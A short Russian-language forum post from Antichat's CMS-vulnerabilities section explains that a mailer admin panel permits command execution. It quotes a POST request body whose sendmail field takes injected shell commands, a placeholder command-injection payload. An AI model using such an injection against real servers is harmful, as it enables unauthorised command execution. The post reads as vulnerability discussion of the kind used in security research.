HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #2  
Старый 29.01.2008, 11:57
blackybr
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
С нами: 10516826

Репутация: 3742


По умолчанию

там исполнение комманд в админке (судя по сплоиту)

нужно два запроса постовых тупо послать, первый из которых уязвим, второй же по-видимому для сохранения результата

Цитата:
testaddress=none@nomail.net&mailer=sendmail&smtp_s erver=&smtp_username=&smtp_password=&
sendmail=[тут комманды]&mail_pause=3&mail_pausetime=4&mail_bounce_email=& mail_bounce_pop3=&mail_bounce_user=&mail_bounce_pa ss=&
updateprefs=Save+Changes
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
 
Ответить с цитированием
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.